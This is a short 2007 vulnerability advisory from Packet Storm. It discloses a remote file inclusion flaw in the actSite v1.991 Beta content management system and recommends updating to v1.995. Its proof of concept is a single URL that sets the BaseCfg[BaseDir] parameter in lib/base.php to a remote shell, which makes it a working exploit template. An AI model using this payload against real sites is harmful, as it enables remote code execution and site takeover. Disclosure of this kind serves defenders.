actsitebase-rfi.txt

2007-10-02T00:00:00
ID PACKETSTORM:59716
Type packetstorm
Reporter DNX
Modified 2007-10-02T00:00:00

Description

                                        
                                            ` \#'#/  
  
(-.-)  
  
---------------------oOO---(_)---OOo--------------------  
  
| actSite v1.991 Beta (base.php) Remote File Inclusion |  
  
| coded by DNX |  
  
--------------------------------------------------------  
  
[!] Discovered: DNX  
  
[!] Vendor: http://www.actsite.de  
  
[!] Detected: 02.09.2007  
  
[!] Reported: 02.09.2007  
  
[!] Remote: yes  
  
  
  
[!] Background: actSite is a content management system based on PHP and MySQL  
  
  
  
[!] Bug: $BaseCfg[BaseDir] in lib/base.php  
  
  
  
[!] PoC:   
  
- http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]  
  
  
  
[!] Solution: Install update to v1.995  
  
  
`